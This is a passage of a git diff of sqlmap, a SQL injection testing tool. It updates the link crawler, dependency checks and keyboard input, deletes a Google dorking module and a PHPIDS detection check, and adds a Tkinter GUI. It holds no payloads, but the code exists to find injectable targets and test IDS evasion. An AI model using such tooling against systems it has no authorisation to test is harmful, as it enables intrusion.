global rules - - detected = False - payload = urldecode(payload, convall=True) - - if not rules: - xmlrules = readXmlFile(paths.PHPIDS_RULES_XML) - rules = [] - - for xmlrule in xmlrules.getElementsByTagName("filter"): - rule = "(?i)%s" % xmlrule.getElementsByTagName('rule')[0].childNodes[0].nodeValue - desc = _adjustGrammar(xmlrule.getElementsByTagName('description')[0].childNodes[0].nodeValue) - rules.append((rule, desc)) - - if payload: - for rule, desc in rules: - if re.search(rule, payload): - detected = True - logger.warn("highly probable IDS/IPS detection: '%s: %s'" % (desc, payload)) - - if not detected: - logger.warn("payload '%s' possibly gone undetected" % payload) diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index 36d92362656..3741d2ace14 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -1,34 +1,55 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import httplib +from __future__ import division + +import os import re -import urlparse +import tempfile import time +from lib.core.common import checkSameHost from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout +from lib.core.common import extractRegexResult from lib.core.common import findPageForms -from lib.core.common import singleTimeWarnMessage +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.common import readInput +from lib.core.common import safeCSValue +from lib.core.common import urldecode +from lib.core.compat import xrange +from lib.core.convert import htmlUnescape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.datatype import OrderedSet +from lib.core.enums import MKSTEMP_PREFIX from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapSyntaxException from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads +from lib.parse.sitemap import parseSitemap from lib.request.connect import Connect as Request +from thirdparty import six from thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup -from thirdparty.oset.pyoset import oset +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib + +def crawl(target, post=None, cookie=None): + if not target: + return -def crawl(target): try: + visited = set() threadData = getCurrentThreadData() - threadData.shared.value = oset() + threadData.shared.value = OrderedSet() + threadData.shared.formsFound = False def crawlThread(): threadData = getCurrentThreadData() @@ -37,26 +58,37 @@ def crawlThread(): with kb.locks.limit: if threadData.shared.unprocessed: current = threadData.shared.unprocessed.pop() + if current in visited: + continue + elif conf.crawlExclude and re.search(conf.crawlExclude, current): + dbgMsg = "skipping '%s'" % current + logger.debug(dbgMsg) + continue + else: + visited.add(current) else: break content = None try: if current: - content = Request.getPage(url=current, crawling=True, raise404=False)[0] - except SqlmapConnectionException, e: - errMsg = "connection exception detected (%s). skipping " % e - errMsg += "url '%s'" % current + content = Request.getPage(url=current, post=post, cookie=None, crawling=True, raise404=False)[0] + except SqlmapConnectionException as ex: + errMsg = "connection exception detected ('%s'). skipping " % getSafeExString(ex) + errMsg += "URL '%s'" % current logger.critical(errMsg) - except httplib.InvalidURL, e: - errMsg = "invalid url detected (%s). skipping " % e - errMsg += "url '%s'" % current + except SqlmapSyntaxException: + errMsg = "invalid URL detected. skipping '%s'" % current + logger.critical(errMsg) + except _http_client.InvalidURL as ex: + errMsg = "invalid URL detected ('%s'). skipping " % getSafeExString(ex) + errMsg += "URL '%s'" % current logger.critical(errMsg) if not kb.threadContinue: break - if isinstance(content, unicode): + if isinstance(content, six.text_type): try: match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) if match: @@ -65,17 +97,19 @@ def crawlThread(): soup = BeautifulSoup(content) tags = soup('a') - if not tags: - tags = re.finditer(r'(?si)<a[^>]+href="(?P<href>[^>"]+)"', content) + tags += re.finditer(r'(?i)\s(href|src)=["\'](?P<href>[^>"\']+)', content) + tags += re.finditer(r'(?i)window\.open\(["\'](?P<href>[^)"\']+)["\']', content) for tag in tags: href = tag.get("href") if hasattr(tag, "get") else tag.group("href") if href: - url = urlparse.urljoin(target, href) + if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: + current = threadData.lastRedirectURL[1] + url = _urllib.parse.urljoin(current, htmlUnescape(href)) # flag to know if we are dealing with the same target host - _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (url, target))) + _ = checkSameHost(url, target) if conf.scope: if not re.search(conf.scope, url, re.I): @@ -83,16 +117,20 @@ def crawlThread(): elif not _: continue - if url.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: + if (extractRegexResult(r"\A[^?]+\.(?P<result>\w+)(\?|\Z)", url) or "").lower() not in CRAWL_EXCLUDE_EXTENSIONS: with kb.locks.value: threadData.shared.deeper.add(url) - if re.search(r"(.*?)\?(.+)", url): + if re.search(r"(.*?)\?(.+)", url) and not re.search(r"\?(v=)?\d+\Z", url) and not re.search(r"(?i)\.(js|css)(\?|\Z)", url): threadData.shared.value.add(url) except UnicodeEncodeError: # for non-HTML files pass + except ValueError: # for non-valid links + pass + except AssertionError: # for invalid HTML + pass finally: if conf.forms: - findPageForms(content, current, False, True) + threadData.shared.formsFound |= len(findPageForms(content, current, False, True)) > 0 if conf.verbose in (1, 2): threadData.shared.count += 1 @@ -102,17 +140,56 @@ def crawlThread(): threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) - logger.info("starting crawler") + _ = re.sub(r"(?<!/)/(?!/).*", "", target) + if _: + if target.strip('/') != _.strip('/'): + threadData.shared.unprocessed.add(_) + + if re.search(r"\?.*\b\w+=", target): + threadData.shared.value.add(target) + + if kb.checkSitemap is None: + message = "do you want to check for the existence of " + message += "site's sitemap(.xml) [y/N] " + kb.checkSitemap = readInput(message, default='N', boolean=True) + + if kb.checkSitemap: + found = True + items = None + url = _urllib.parse.urljoin(target, "/sitemap.xml") + try: + items = parseSitemap(url) + except SqlmapConnectionException as ex: + if "page not found" in getSafeExString(ex): + found = False + logger.warning("'sitemap.xml' not found") + except: + pass + finally: + if found: + if items: + for item in items: + if re.search(r"(.*?)\?(.+)", item): + threadData.shared.value.add(item) + if conf.crawlDepth > 1: + threadData.shared.unprocessed.update(items) + logger.info("%s links found" % ("no" if not items else len(items))) + + if not conf.bulkFile: + infoMsg = "starting crawler for target URL '%s'" % target + logger.info(infoMsg) for i in xrange(conf.crawlDepth): - if i > 0 and conf.threads == 1: - singleTimeWarnMessage("running in a single-thread mode. This could take a while.") threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) - logger.info("searching for links with depth %d" % (i + 1)) - runThreads(numThreads, crawlThread) + + if not conf.bulkFile: + logger.info("searching for links with depth %d" % (i + 1)) + + runThreads(numThreads, crawlThread, threadChoice=(i > 0)) clearConsoleLine(True) + if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: @@ -121,14 +198,68 @@ def crawlThread(): except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" - logger.warn(warnMsg) + logger.warning(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: - warnMsg = "no usable links found (with GET parameters)" - logger.warn(warnMsg) + if not (conf.forms and threadData.shared.formsFound): + warnMsg = "no usable links found (with GET parameters)" + if conf.forms: + warnMsg += " or forms" + logger.warning(warnMsg) else: for url in threadData.shared.value: - kb.targets.add((url, None, None, None)) + kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None)) + + if kb.targets: + if kb.normalizeCrawlingChoice is None: + message = "do you want to normalize " + message += "crawling results [Y/n] " + + kb.normalizeCrawlingChoice = readInput(message, default='Y', boolean=True) + + if kb.normalizeCrawlingChoice: + seen = set() + results = OrderedSet() + + for target in kb.targets: + value = "%s%s%s" % (target[0], '&' if '?' in target[0] else '?', target[2] or "") + match = re.search(r"/[^/?]*\?.+\Z", value) + if match: + key = re.sub(r"=[^=&]*", "=", match.group(0)).strip("&?") + if '=' in key and key not in seen: + results.add(target) + seen.add(key) + + kb.targets = results + + storeResultsToFile(kb.targets) + +def storeResultsToFile(results): + if not results: + return + + if kb.storeCrawlingChoice is None: + message = "do you want to store crawling results to a temporary file " + message += "for eventual further processing with other tools [y/N] " + + kb.storeCrawlingChoice = readInput(message, default='N', boolean=True) + + if kb.storeCrawlingChoice: + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CRAWLER, suffix=".csv" if conf.forms else ".txt") + os.close(handle) + + infoMsg = "writing crawling results to a temporary file '%s' " % filename + logger.info(infoMsg) + + with openFile(filename, "w+") as f: + if conf.forms: + f.write("URL,POST\n") + + for url, _, data, _, _ in results: + if conf.forms: + f.write("%s,%s\n" % (safeCSValue(url), safeCSValue(data or ""))) + else: + f.write("%s\n" % url) diff --git a/lib/utils/deps.py b/lib/utils/deps.py index 911b0eb41b2..51a9a23ea46 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import logger @@ -19,33 +19,52 @@ def checkDependencies(): try: if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): - import _mssql - import pymssql + __import__("_mssql") + pymssql = __import__("pymssql") if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": warnMsg = "'%s' third-party library must be " % data[1] warnMsg += "version >= 1.0.2 to work properly. " - warnMsg += "Download from %s" % data[2] - logger.warn(warnMsg) + warnMsg += "Download from '%s'" % data[2] + logger.warning(warnMsg) elif dbmsName == DBMS.MYSQL: - import pymysql - elif dbmsName == DBMS.PGSQL: - import psycopg2 + __import__("pymysql") + elif dbmsName in (DBMS.PGSQL, DBMS.CRATEDB): + __import__("psycopg2") elif dbmsName == DBMS.ORACLE: - import cx_Oracle + __import__("oracledb") elif dbmsName == DBMS.SQLITE: - import sqlite3 + __import__("sqlite3") elif dbmsName == DBMS.ACCESS: - import pyodbc + __import__("pyodbc") elif dbmsName == DBMS.FIREBIRD: - import kinterbasdb + __import__("kinterbasdb") elif dbmsName == DBMS.DB2: - import ibm_db_dbi - except ImportError: + __import__("ibm_db_dbi") + elif dbmsName in (DBMS.HSQLDB, DBMS.CACHE): + __import__("jaydebeapi") + __import__("jpype") + elif dbmsName == DBMS.INFORMIX: + __import__("ibm_db_dbi") + elif dbmsName == DBMS.MONETDB: + __import__("pymonetdb") + elif dbmsName == DBMS.DERBY: + __import__("drda") + elif dbmsName == DBMS.VERTICA: + __import__("vertica_python") + elif dbmsName == DBMS.PRESTO: + __import__("prestodb") + elif dbmsName == DBMS.MIMERSQL: + __import__("mimerpy") + elif dbmsName == DBMS.CUBRID: + __import__("CUBRIDdb") + elif dbmsName == DBMS.CLICKHOUSE: + __import__("clickhouse_connect") + except: warnMsg = "sqlmap requires '%s' third-party library " % data[1] - warnMsg += "in order to directly connect to the database " - warnMsg += "%s. Download from %s" % (dbmsName, data[2]) - logger.warn(warnMsg) + warnMsg += "in order to directly connect to the DBMS " + warnMsg += "'%s'. Download from '%s'" % (dbmsName, data[2]) + logger.warning(warnMsg) missing_libraries.add(data[1]) continue @@ -54,30 +73,71 @@ def checkDependencies(): logger.debug(debugMsg) try: - import impacket + __import__("impacket") debugMsg = "'python-impacket' third-party library is found" logger.debug(debugMsg) except ImportError: warnMsg = "sqlmap requires 'python-impacket' third-party library for " warnMsg += "out-of-band takeover feature. Download from " - warnMsg += "http://code.google.com/p/impacket/" - logger.warn(warnMsg) + warnMsg += "'https://github.com/coresecurity/impacket'" + logger.warning(warnMsg) missing_libraries.add('python-impacket') try: - import ntlm + __import__("ntlm") debugMsg = "'python-ntlm' third-party library is found" logger.debug(debugMsg) except ImportError: - warnMsg = "sqlmap requires 'python-ntlm' third-party library for " + warnMsg = "sqlmap requires 'python-ntlm' third-party library " warnMsg += "if you plan to attack a web application behind NTLM " - warnMsg += "authentication. Download from http://code.google.com/p/python-ntlm/" - logger.warn(warnMsg) + warnMsg += "authentication. Download from 'https://github.com/mullender/python-ntlm'" + logger.warning(warnMsg) missing_libraries.add('python-ntlm') + try: + __import__("httpx") + debugMsg = "'httpx[http2]' third-party library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'httpx[http2]' third-party library " + warnMsg += "if you plan to use HTTP version 2" + logger.warning(warnMsg) + missing_libraries.add('httpx[http2]') + + try: + __import__("websocket._abnf") + debugMsg = "'websocket-client' library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'websocket-client' third-party library " + warnMsg += "if you plan to attack a web application using WebSocket. " + warnMsg += "Download from 'https://pypi.python.org/pypi/websocket-client/'" + logger.warning(warnMsg) + missing_libraries.add('websocket-client') + + try: + __import__("tkinter") + debugMsg = "'tkinter' library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'tkinter' library " + warnMsg += "if you plan to run a GUI" + logger.warning(warnMsg) + missing_libraries.add('tkinter') + + try: + __import__("tkinter.ttk") + debugMsg = "'tkinter.ttk' library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'tkinter.ttk' library " + warnMsg += "if you plan to run a GUI" + logger.warning(warnMsg) + missing_libraries.add('tkinter.ttk') + if IS_WIN: try: - import pyreadline + __import__("pyreadline") debugMsg = "'python-pyreadline' third-party library is found" logger.debug(debugMsg) except ImportError: @@ -85,11 +145,10 @@ def checkDependencies(): warnMsg += "be able to take advantage of the sqlmap TAB " warnMsg += "completion and history support features in the SQL " warnMsg += "shell and OS shell. Download from " - warnMsg += "http://ipython.scipy.org/moin/PyReadline/Intro" - logger.warn(warnMsg) + warnMsg += "'https://pypi.org/project/pyreadline/'" + logger.warning(warnMsg) missing_libraries.add('python-pyreadline') if len(missing_libraries) == 0: infoMsg = "all dependencies are installed" logger.info(infoMsg) - diff --git a/lib/utils/getch.py b/lib/utils/getch.py index 65a54e14741..00c92f87368 100644 --- a/lib/utils/getch.py +++ b/lib/utils/getch.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ class _Getch(object): @@ -16,16 +16,15 @@ def __init__(self): except ImportError: try: self.impl = _GetchMacCarbon() - except(AttributeError, ImportError): + except (AttributeError, ImportError): self.impl = _GetchUnix() def __call__(self): return self.impl() - class _GetchUnix(object): def __init__(self): - import tty + __import__("tty") def __call__(self): import sys @@ -41,16 +40,14 @@ def __call__(self): termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch - class _GetchWindows(object): def __init__(self): - import msvcrt + __import__("msvcrt") def __call__(self): import msvcrt return msvcrt.getch() - class _GetchMacCarbon(object): """ A function which returns the current ASCII key that is down; @@ -60,10 +57,12 @@ class _GetchMacCarbon(object): """ def __init__(self): import Carbon - Carbon.Evt # see if it has this (in Unix, it doesn't) + + getattr(Carbon, "Evt") # see if it has this (in Unix, it doesn't) def __call__(self): import Carbon + if Carbon.Evt.EventAvail(0x0008)[0] == 0: # 0x0008 is the keyDownMask return '' else: @@ -79,6 +78,4 @@ def __call__(self): (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1] return chr(msg & 0x000000FF) - getch = _Getch() - diff --git a/lib/utils/google.py b/lib/utils/google.py deleted file mode 100644 index 7b74b296efd..00000000000 --- a/lib/utils/google.py +++ /dev/null @@ -1,106 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import httplib -import re -import socket -import urllib -import urllib2 - -from lib.core.common import getUnicode -from lib.core.common import urlencode -from lib.core.data import conf -from lib.core.data import logger -from lib.core.enums import CUSTOM_LOGGING -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapGenericException -from lib.core.settings import GOOGLE_REGEX -from lib.core.settings import UNICODE_ENCODING -from lib.request.basic import decodePage - -class Google(object): - """ - This class defines methods used to perform Google dorking (command - line option '-g <google dork>' - """ - - def __init__(self, handlers): - self._cj = cookielib.CookieJar() - - handlers.append(urllib2.HTTPCookieProcessor(self._cj)) - - self.opener = urllib2.build_opener(*handlers) - self.opener.addheaders = conf.httpHeaders - - try: - conn = self.opener.open("http://www.google.com/ncr") - conn.info() # retrieve session cookie - except urllib2.HTTPError, e: - e.info() - except urllib2.URLError: - errMsg = "unable to connect to Google" - raise SqlmapConnectionException(errMsg) - - def search(self, dork): - """ - This method performs the effective search on Google providing - the google dork and the Google session cookie - """ - - gpage = conf.googlePage if conf.googlePage > 1 else 1 - logger.info("using Google result page #%d" % gpage) - - if not dork: - return None - - url = "http://www.google.com/search?" - url += "q=%s&" % urlencode(dork, convall=True) - url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" - url += "&start=%d" % ((gpage - 1) * 100) - - try: - conn = self.opener.open(url) - - requestMsg = "HTTP request:\nGET %s" % url - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - page = conn.read() - code = conn.code - status = conn.msg - responseHeaders = conn.info() - page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) - - responseMsg = "HTTP response (%s - %d):\n" % (status, code) - - if conf.verbose <= 4: - responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) - elif conf.verbose > 4: - responseMsg += "%s\n%s\n" % (responseHeaders, page) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - except urllib2.HTTPError, e: - try: - page = e.read() - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code - logger.critical(warnMsg) - return None - except (urllib2.URLError, socket.error, socket.timeout): - errMsg = "unable to connect to Google" - raise SqlmapConnectionException(errMsg) - - retVal = [urllib.unquote(match.group(1)) for match in re.finditer(GOOGLE_REGEX, page, re.I | re.S)] - - if not retVal and "detected unusual traffic" in page: - warnMsg = "Google has detected 'unusual' traffic from " - warnMsg += "this computer disabling further searches" - raise SqlmapGenericException(warnMsg) - - return retVal diff --git a/lib/utils/gui.py b/lib/utils/gui.py new file mode 100644 index 00000000000..3e3500bc507 --- /dev/null +++ b/lib/utils/gui.py @@ -0,0 +1,426 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re +import socket +import subprocess +import sys +import tempfile +import threading +import webbrowser + +from lib.core.common import getSafeExString +from lib.core.common import saveConfig +from lib.core.data import paths +from lib.core.defaults import defaults +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapMissingDependence +from lib.core.exception import SqlmapSystemException +from lib.core.settings import DEV_EMAIL_ADDRESS +from lib.core.settings import IS_WIN +from lib.core.settings import ISSUES_PAGE +from lib.core.settings import GIT_PAGE +from lib.core.settings import SITE +from lib.core.settings import VERSION_STRING +from lib.core.settings import WIKI_PAGE +from thirdparty.six.moves import queue as _queue + +alive = None +line = "" +process = None +queue = None + +def runGui(parser): + try: + from thirdparty.six.moves import tkinter as _tkinter + from thirdparty.six.moves import tkinter_scrolledtext as _tkinter_scrolledtext + from thirdparty.six.moves import tkinter_ttk as _tkinter_ttk + from thirdparty.six.moves import tkinter_messagebox as _tkinter_messagebox + except ImportError as ex: + raise SqlmapMissingDependence("missing dependence ('%s')" % getSafeExString(ex)) + + # Reference: https://www.reddit.com/r/learnpython/comments/985umy/limit_user_input_to_only_int_with_tkinter/e4dj9k9?utm_source=share&utm_medium=web2x + class ConstrainedEntry(_tkinter.Entry): + def __init__(self, master=None, **kwargs): + self.var = _tkinter.StringVar() + self.regex = kwargs["regex"] + del kwargs["regex"] + _tkinter.Entry.__init__(self, master, textvariable=self.var, **kwargs) + self.old_value = '' + self.var.trace('w', self.check) + self.get, self.set = self.var.get, self.var.set + + def check(self, *args): + if re.search(self.regex, self.get()): + self.old_value = self.get() + else: + self.set(self.old_value) + + try: + window = _tkinter.Tk() + except Exception as ex: + errMsg = "unable to create GUI window ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) + + window.title("sqlmap - Tkinter GUI") + + # Set theme and colors + bg_color = "#f5f5f5" + fg_color = "#333333" + accent_color = "#2c7fb8" + window.configure(background=bg_color) + + # Configure styles + style = _tkinter_ttk.Style() + + # Try to use a more modern theme if available + available_themes = style.theme_names() + if 'clam' in available_themes: + style.theme_use('clam') + elif 'alt' in available_themes: + style.theme_use('alt') + + # Configure notebook style + style.configure("TNotebook", background=bg_color) + style.configure("TNotebook.Tab", + padding=[10, 4], + background="#e1e1e1", + font=('Helvetica', 9)) + style.map("TNotebook.Tab", + background=[("selected", accent_color), ("active", "#7fcdbb")], + foreground=[("selected", "white"), ("active", "white")]) + + # Configure button style + style.configure("TButton", + padding=4, + relief="flat", + background=accent_color, + foreground="white", + font=('Helvetica', 9)) + style.map("TButton", + background=[('active', '#41b6c4')]) + + # Reference: https://stackoverflow.com/a/10018670 + def center(window): + window.update_idletasks() + width = window.winfo_width() + frm_width = window.winfo_rootx() - window.winfo_x() + win_width = width + 2 * frm_width + height = window.winfo_height() + titlebar_height = window.winfo_rooty() - window.winfo_y() + win_height = height + titlebar_height + frm_width + x = window.winfo_screenwidth() // 2 - win_width // 2 + y = window.winfo_screenheight() // 2 - win_height // 2 + window.geometry('{}x{}+{}+{}'.format(width, height, x, y)) + window.deiconify() + + def onKeyPress(event): + global line + global queue + + if process: + if event.char == '\b': + line = line[:-1] + else: + line += event.char + + def onReturnPress(event): + global line + global queue + + if process: + try: + process.stdin.write(("%s\n" % line.strip()).encode()) + process.stdin.flush() + except socket.error: + line = "" + event.widget.master.master.destroy() + return "break" + except: + return + + event.widget.insert(_tkinter.END, "\n") + + return "break" + + def run(): + global alive + global process + global queue + + config = {} + + for key in window._widgets: + dest, widget_type = key + widget = window._widgets[key] + + if hasattr(widget, "get") and not widget.get(): + value = None + elif widget_type == "string": + value = widget.get() + elif widget_type == "float": + value = float(widget.get()) + elif widget_type == "int": + value = int(widget.get()) + else: + value = bool(widget.var.get()) + + config[dest] = value + + for option in parser.option_list: + # Only set default if not already set by the user + if option.dest not in config or config[option.dest] is None: + config[option.dest] = defaults.get(option.dest, None) + + handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True) + os.close(handle) + + saveConfig(config, configFile) + + def enqueue(stream, queue): + global alive + + for line in iter(stream.readline, b''): + queue.put(line) + + alive = False + stream.close() + + alive = True + + process = subprocess.Popen([sys.executable or "python", os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap.py"), "-c", configFile], shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, bufsize=1, close_fds=not IS_WIN) + + # Reference: https://stackoverflow.com/a/4896288 + queue = _queue.Queue() + thread = threading.Thread(target=enqueue, args=(process.stdout, queue)) + thread.daemon = True + thread.start() + + top = _tkinter.Toplevel() + top.title("Console") + top.configure(background=bg_color) + + # Create a frame for the console + console_frame = _tkinter.Frame(top, bg=bg_color) + console_frame.pack(fill=_tkinter.BOTH, expand=True, padx=10, pady=10) + + # Reference: https://stackoverflow.com/a/13833338 + text = _tkinter_scrolledtext.ScrolledText(console_frame, undo=True, wrap=_tkinter.WORD, + bg="#2c3e50", fg="#ecf0f1", + insertbackground="white", + font=('Consolas', 10)) + text.bind("<Key>", onKeyPress) + text.bind("<Return>", onReturnPress) + text.pack(fill=_tkinter.BOTH, expand=True) + text.focus() + + center(top) + + while True: + line = "" + try: + line = queue.get(timeout=.1) + text.insert(_tkinter.END, line) + except _queue.Empty: + text.see(_tkinter.END) + text.update_idletasks() + + if not alive: + break + + # Create a menu bar + menubar = _tkinter.Menu(window, bg=bg_color, fg=fg_color) + + filemenu = _tkinter.Menu(menubar, tearoff=0, bg=bg_color, fg=fg_color) + filemenu.add_command(label="Open", state=_tkinter.DISABLED) + filemenu.add_command(label="Save", state=_tkinter.DISABLED) + filemenu.add_separator() + filemenu.add_command(label="Exit", command=window.quit) + menubar.add_cascade(label="File", menu=filemenu) + + menubar.add_command(label="Run", command=run) + + helpmenu = _tkinter.Menu(menubar, tearoff=0, bg=bg_color, fg=fg_color) + helpmenu.add_command(label="Official site", command=lambda: webbrowser.open(SITE)) + helpmenu.add_command(label="Github pages", command=lambda: webbrowser.open(GIT_PAGE)) + helpmenu.add_command(label="Wiki pages", command=lambda: webbrowser.open(WIKI_PAGE)) + helpmenu.add_command(label="Report issue", command=lambda: webbrowser.open(ISSUES_PAGE)) + helpmenu.add_separator() + helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "%s\n\n (%s)" % (VERSION_STRING, DEV_EMAIL_ADDRESS))) + menubar.add_cascade(label="Help", menu=helpmenu) + + window.config(menu=menubar, bg=bg_color) + window._widgets = {} + + # Create header frame + header_frame = _tkinter.Frame(window, bg=bg_color, height=60) + header_frame.pack(fill=_tkinter.X, pady=(0, 5)) + header_frame.pack_propagate(0) + + # Add header label + title_label = _tkinter.Label(header_frame, text="Configuration", + font=('Helvetica', 14), + fg=accent_color, bg=bg_color) + title_label.pack(side=_tkinter.LEFT, padx=15) + + # Add run button in header + run_button = _tkinter_ttk.Button(header_frame, text="Run", command=run, width=12) + run_button.pack(side=_tkinter.RIGHT, padx=15) + + # Create notebook + notebook = _tkinter_ttk.Notebook(window) + notebook.pack(expand=1, fill="both", padx=5, pady=(0, 5)) + + # Store tab information for background loading + tab_frames = {} + tab_canvases = {} + tab_scrollable_frames = {} + tab_groups = {} + + # Create empty tabs with scrollable areas first (fast) + for group in parser.option_groups: + # Create a frame with scrollbar for the tab + tab_frame = _tkinter.Frame(notebook, bg=bg_color) + tab_frames[group.title] = tab_frame + + # Create a canvas with scrollbar + canvas = _tkinter.Canvas(tab_frame, bg=bg_color, highlightthickness=0) + scrollbar = _tkinter_ttk.Scrollbar(tab_frame, orient="vertical", command=canvas.yview) + scrollable_frame = _tkinter.Frame(canvas, bg=bg_color) + + # Store references + tab_canvases[group.title] = canvas + tab_scrollable_frames[group.title] = scrollable_frame + tab_groups[group.title] = group + + # Configure the canvas scrolling + scrollable_frame.bind( + "<Configure>", + lambda e, canvas=canvas: canvas.configure(scrollregion=canvas.bbox("all")) + ) + + canvas.create_window((0, 0), window=scrollable_frame, anchor="nw") + canvas.configure(yscrollcommand=scrollbar.set) + + # Pack the canvas and scrollbar + canvas.pack(side="left", fill="both", expand=True) + scrollbar.pack(side="right", fill="y") + + # Add the tab to the notebook + notebook.add(tab_frame, text=group.title) + + # Add a loading indicator + loading_label = _tkinter.Label(scrollable_frame, text="Loading options...", + font=('Helvetica', 12), + fg=accent_color, bg=bg_color) + loading_label.pack(expand=True) + + # Function to populate a tab in the background + def populate_tab(tab_name): + group = tab_groups[tab_name] + scrollable_frame = tab_scrollable_frames[tab_name] + canvas = tab_canvases[tab_name] + + # Remove loading indicator + for child in scrollable_frame.winfo_children(): + child.destroy() + + # Add content to the scrollable frame + row = 0 + + if group.get_description(): + desc_label = _tkinter.Label(scrollable_frame, text=group.get_description(), + wraplength=600, justify="left", + font=('Helvetica', 9), + fg="#555555", bg=bg_color) + desc_label.grid(row=row, column=0, columnspan=3, sticky="w", padx=10, pady=(10, 5)) + row += 1 + + for option in group.option_list: + # Option label + option_label = _tkinter.Label(scrollable_frame, + text=parser.formatter._format_option_strings(option) + ":", + font=('Helvetica', 9), + fg=fg_color, bg=bg_color, + anchor="w") + option_label.grid(row=row, column=0, sticky="w", padx=10, pady=2) + + # Input widget + if option.type == "string": + widget = _tkinter.Entry(scrollable_frame, font=('Helvetica', 9), + relief="sunken", bd=1, width=20) + widget.grid(row=row, column=1, sticky="w", padx=5, pady=2) + elif option.type == "float": + widget = ConstrainedEntry(scrollable_frame, regex=r"\A\d*\.?\d*\Z", + font=('Helvetica', 9), + relief="sunken", bd=1, width=10) + widget.grid(row=row, column=1, sticky="w", padx=5, pady=2) + elif option.type == "int": + widget = ConstrainedEntry(scrollable_frame, regex=r"\A\d*\Z", + font=('Helvetica', 9), + relief="sunken", bd=1, width=10) + widget.grid(row=row, column=1, sticky="w", padx=5, pady=2) + else: + var = _tkinter.IntVar() + widget = _tkinter.Checkbutton(scrollable_frame, variable=var, + bg=bg_color, activebackground=bg_color) + widget.var = var + widget.grid(row=row, column=1, sticky="w", padx=5, pady=2) + + # Help text (truncated to improve performance) + help_text = option.help + if len(help_text) > 100: + help_text = help_text[:100] + "..." + + help_label = _tkinter.Label(scrollable_frame, text=help_text, + font=('Helvetica', 8), + fg="#666666", bg=bg_color, + wraplength=400, justify="left") + help_label.grid(row=row, column=2, sticky="w", padx=5, pady=2) + + # Store widget reference + window._widgets[(option.dest, option.type)] = widget + + # Set default value + default = defaults.get(option.dest) + if default: + if hasattr(widget, "insert"): + widget.insert(0, default) + elif hasattr(widget, "var"): + widget.var.set(1 if default else 0) + + row += 1 + + # Add some padding at the bottom + _tkinter.Label(scrollable_frame, bg=bg_color, height=1).grid(row=row, column=0) + + # Update the scroll region after adding all widgets + canvas.update_idletasks() + canvas.configure(scrollregion=canvas.bbox("all")) + + # Update the UI to show the tab is fully loaded + window.update_idletasks() + + # Function to populate tabs in the background + def populate_tabs_background(): + for tab_name in tab_groups.keys(): + # Schedule each tab to be populated with a small delay between them + window.after(100, lambda name=tab_name: populate_tab(name)) + + # Start populating tabs in the background after a short delay + 